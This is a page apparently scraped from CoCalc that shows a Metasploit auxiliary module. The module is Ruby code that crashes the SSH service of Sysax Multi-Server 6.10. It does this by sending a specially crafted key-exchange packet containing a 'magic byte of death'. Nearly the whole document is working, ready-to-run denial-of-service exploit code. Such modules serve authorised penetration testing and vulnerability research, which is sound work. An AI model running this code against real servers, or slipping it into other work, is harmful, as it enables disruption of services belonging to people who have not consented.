Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
19513 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',
15
'Description' => %q{
16
This module sends a specially-crafted SSH Key Exchange causing the service to
17
crash.
18
},
19
'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',
20
'License' => MSF_LICENSE,
21
'References' => [
22
[ 'OSVDB', '92081'],
23
[ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']
24
],
25
'DisclosureDate' => '2013-03-17',
26
'Notes' => {
27
'Stability' => [CRASH_SERVICE_DOWN],
28
'SideEffects' => [],
29
'Reliability' => []
30
}
31
)
32
)
33
34
register_options(
35
[
36
Opt::RPORT(22),
37
OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])
38
]
39
)
40
end
41
42
def get_packet
43
delimiter = "\x00" * 3
44
packet = [
45
0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
46
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
47
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
48
0x00, 0x7e
49
].pack('C*')
50
packet << Rex::Text.rand_text_alphanumeric(126)
51
packet << delimiter
52
packet << Rex::Text.rand_text_alphanumeric(16)
53
packet << delimiter
54
packet << Rex::Text.rand_text_alphanumeric(158)
55
packet << delimiter
56
packet << Rex::Text.rand_text_alphanumeric(158)
57
packet << delimiter
58
packet << Rex::Text.rand_text_alphanumeric(106)
59
packet << delimiter
60
packet << Rex::Text.rand_text_alphanumeric(106)
61
packet << delimiter
62
packet << "\x28" # Magic byte of death - seems to work with just about
63
# anything except \x1a, the value it's supposed to be
64
packet << Rex::Text.rand_text_alphanumeric(26)
65
packet << delimiter
66
packet << Rex::Text.rand_text_alphanumeric(27)
67
packet << delimiter * 7
68
end
69
70
def run
71
connect
72
73
banner = sock.get_once || ''
74
print_status("Banner: #{banner.strip}")
75
sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)
76
77
# Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.
78
begin
79
sock.get_once
80
rescue Errno::ECONNRESET => e
81
vprint_error(e.message)
82
end
83
84
disconnect
85
end
86
end
87
88